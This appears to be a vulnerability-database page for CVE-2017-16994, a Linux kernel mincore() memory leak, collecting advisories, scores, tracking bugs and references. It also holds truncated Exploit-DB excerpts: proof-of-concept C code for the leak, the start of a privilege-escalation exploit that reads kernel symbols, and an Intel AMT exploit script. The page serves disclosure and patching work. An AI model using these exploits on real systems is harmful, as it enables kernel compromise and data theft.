CVE-2017-16994
Published: 2017-11-27
Priority: P4 · 30 · medium · 5.5 (CVSS 3.0)
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Exploit: available
EPSS: 2.08% (79.2th percentile)
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | linux | < linux 4.14.2-1 (bookworm) | linux 4.14.2-1 (bookworm) |
| linux | linux_kernel | < 4.14.2 | 4.14.2 |
| linux | linux_kernel | >= 0 < 4.14.2-1 | 4.14.2-1 |
| linux | linux_kernel | >= 0 < 4.14.2-1 | 4.14.2-1 |
| linux | linux_kernel | >= 0 < 4.14.2-1 | 4.14.2-1 |
| linux | linux_kernel | >= 0 < 4.14.2-1 | 4.14.2-1 |
| linux | linux_kernel | >= 0 < 4.4.0-119.143 | 4.4.0-119.143 |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 5.5 | MEDIUM | CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 2.1 | LOW | AV:L/AC:L/Au:N/C:P/I:N/A:N |
| osv | | 7.8 | HIGH | |
| vendor_ubuntu | | 7.8 | HIGH | |
| vendor_debian | | 5.5 | MEDIUM | |
| vendor_redhat | | 5.5 | MEDIUM | |
Ubuntu
Linux kernel (Azure) vulnerabilities
vendor_ubuntu·2018-04-24·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel (Azure) vulnerabilities
Title: Linux kernel (Azure) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2017-1000407)
It was discovered that a use-after-free vulnerability existed in the
network namespaces implementation in the Linux kernel. A local attacker
could use this to cause a denial of servic
Ubuntu
Linux kernel (Xenial HWE) vulnerabilities
vendor_ubuntu·2018-04-05·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel (Xenial HWE) vulnerabilities
Title: Linux kernel (Xenial HWE) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu
14.04 LTS.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-04-04·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could
Ubuntu
Linux kernel (Raspberry Pi 2) vulnerabilities
vendor_ubuntu·2018-04-04·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel (Raspberry Pi 2) vulnerabilities
Title: Linux kernel (Raspberry Pi 2) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that a use-after-free vulnerability existed in the
network namespaces implementation in the Linux kernel. A local attacker
could use this to cause a denial of service (system crash) or possibly
execute arbitrary code. (CVE-2017-15129)
Andrey Konovalov discovered that the usbtest device driver in the Linux
kernel did not properly validate endpoint metadata. A physically proximate
attacker coul
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-04-03·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2017-1000407)
It was discovered that a use-after-free vulnerability existed in the
network namespaces implementation in the Linux kernel. A local attacker
could use this to cause a denial of service (syste
Ubuntu
Linux (HWE) vulnerabilities
vendor_ubuntu·2018-04-03·CVSS 7.8
CVE-2017-0861 [HIGH] Linux (HWE) vulnerabilities
Title: Linux (HWE) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.
This update provides the corresponding updates for the Linux Hardware
Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2
Red Hat
kernel: mm/pagewalk.c: walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
vendor_redhat·2017-11-15·CVSS 5.5
CVE-2017-16994 [MEDIUM] CWE-200 kernel: mm/pagewalk.c: walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
kernel: mm/pagewalk.c: walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
The walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
Statement: This issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5, 6, 7 and Red Hat Enterprise MRG 2, as a co
Debian
CVE-2017-16994: linux - The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14...
vendor_debian·2017·CVSS 5.5
CVE-2017-16994 [MEDIUM] CVE-2017-16994: linux - The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14...
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
Scope: local
bookworm: resolved (fixed in 4.14.2-1)
bullseye: resolved (fixed in 4.14.2-1)
forky: resolved (fixed in 4.14.2-1)
sid: resolved (fixed in 4.14.2-1)
trixie: resolved (fixed in 4.14.2-1)
GHSA
GHSA-3h5j-qwmx-f9m6: The walk_hugetlb_range function in mm/pagewalk
ghsa_unreviewed·2022-05-14
CVE-2017-16994 [MEDIUM] CWE-200 GHSA-3h5j-qwmx-f9m6: The walk_hugetlb_range function in mm/pagewalk
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
OSV
linux-azure vulnerabilities
osv·2018-04-24·CVSS 7.8
CVE-2017-0861 [HIGH] linux-azure vulnerabilities
linux-azure vulnerabilities
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2017-1000407)
It was discovered that a use-after-free vulnerability existed in the
network namespaces implementation in the Linux kernel. A local attacker
could use this to cause a denial of service (system crash) or possibly
execute arbitrary code. (CVE-2017-15129)
It was disc
OSV
linux-lts-xenial, linux-aws vulnerabilities
osv·2018-04-05·CVSS 7.8
[HIGH] linux-lts-xenial, linux-aws vulnerabilities
linux-lts-xenial, linux-aws vulnerabilities
USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu
14.04 LTS.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-08
OSV
linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
osv·2018-04-04·CVSS 7.8
CVE-2017-16995 [HIGH] linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial
OSV
linux-hwe, linux-gcp, linux-oem vulnerabilities
osv·2018-04-03·CVSS 7.8
[HIGH] linux-hwe, linux-gcp, linux-oem vulnerabilities
linux-hwe, linux-gcp, linux-oem vulnerabilities
USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.
This update provides the corresponding updates for the Linux Hardware
Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2017-1000407)
It was discovered that a use-after-free
OSV
CVE-2017-16994: The walk_hugetlb_range function in mm/pagewalk
osv·2017-11-27·CVSS 5.5
CVE-2017-16994 [MEDIUM] CVE-2017-16994: The walk_hugetlb_range function in mm/pagewalk
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
No detection rules found.
Exploit-DB
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
exploitdb·2017-12-11
CVE-2017-16994 Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
---
/** disable_map_min_add.c **/
/*
*
*/
#include
#include
#include
#include
#include
#include
#include
/* offsets might differ, kernel was custom compiled
* you can read vmlinux and caculate the offset when testing
*/
/*
#define OFFSET_KERNEL_BASE 0x000000
*/
#define MMAP_MIN_ADDR 0x1101de8
#define DAC_MMAP_MIN_ADDR 0xe8e810
/* get kernel functions address by reading /proc/kallsyms */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
printf("[-] Failed to open /proc/kallsyms\n");
exit(-1);
}
printf("[+] Find %s...\n", name);
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (r
Exploit-DB
Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
exploitdb·2017-12-11
CVE-2017-16994 Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
---
/*
* The source is modified from
* https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
* I try to find out infomation useful from the infoleak
* The kernel address can be easily found out from the uninitialized memory
* leaked from kernel, which can help bypass kaslr
*/
#define _GNU_SOURCE
#include
#include
#include
#include
int main(void) {
unsigned char buf[getpagesize()/sizeof(unsigned char)];
int right = 1;
unsigned long addr = 0;
/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
err(1, "mmap");
while(right){
/* Touch a mishandle with this type mapping */
if (mincore((void*)0x86000000,
Exploit-DB
Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure
exploitdb·2017-11-24
CVE-2017-16994 Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure
Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure
---
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
I found the following bug with an AFL-based fuzzer:
When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.
This bug can be reproduced with the following testcase:
$ cat mincore_test.c
*/
#define _GNU_SOURCE
#include
#include
#include
#include
unsigned char mcbuf[0x1000];
int main(void) {
if (mmap((void*)0x66000000, 0x20000000000, PR
Exploit-DB
Intel Active Management Technology - System Privileges
exploitdb·2017-05-10·CVSS 9.8
CVE-2017-5689 [CRITICAL] Intel Active Management Technology - System Privileges
Intel Active Management Technology - System Privileges
---
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-5689 = {
# dork="Server: Intel(R) Active Management Technology" port:"16992",
# ports=[
# 623,
# 664,
# 16992,
# 16993,
# 16994,
# 16995
# ]
# products=[
# Active Management Technology (AMT),
# Intel Standard Manageability (ISM),
# Intel Small Business Technology (SBT)
# ]
# version=[
# 6.x,
# 7.x,
# 8.x,
# 9.x,
# 10.x,
# 11.0,
# 11.5,
# 11.6
# ]
import functools
import requests
import logging
import uuid
logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger(__file__)
TIMEOUT = 8
def handle_exception(func):
functools.wraps(func)
def wrapper(*args, **kwds):
try:
return func(*args, **kwds)
except Exception as err:
log.error
Bugzilla
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak [fedora-all]
bugzilla·2017-11-28·CVSS 5.5
CVE-2017-16994 [MEDIUM] CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak [fedora-all]
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit me
Bugzilla
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
bugzilla·2017-11-28·CVSS 5.5
CVE-2017-16994 [MEDIUM] CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
The walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
References:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
https://www.exploit-db.com/exploits/43178/
A flaw was introduced by:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1e25a271c8ac1c9faebf4eb3fa609189e4e7b1b6
An upstream patch:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41
References
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7c
http://www.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.2
http://www.securityfocus.com/bid/101969
https://access.redhat.com/errata/RHSA-2018:0502
https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
https://github.com/torvalds/linux/commit/373c4557d2aa362702c4c2d41288fb1e54990b7c
https://usn.ubuntu.com/3617-1/
https://usn.ubuntu.com/3617-2/
https://usn.ubuntu.com/3617-3/
https://usn.ubuntu.com/3619-1/
https://usn.ubuntu.com/3619-2/
https://usn.ubuntu.com/3632-1/
https://www.exploit-db.com/exploits/43178/
Published: 2017-11-27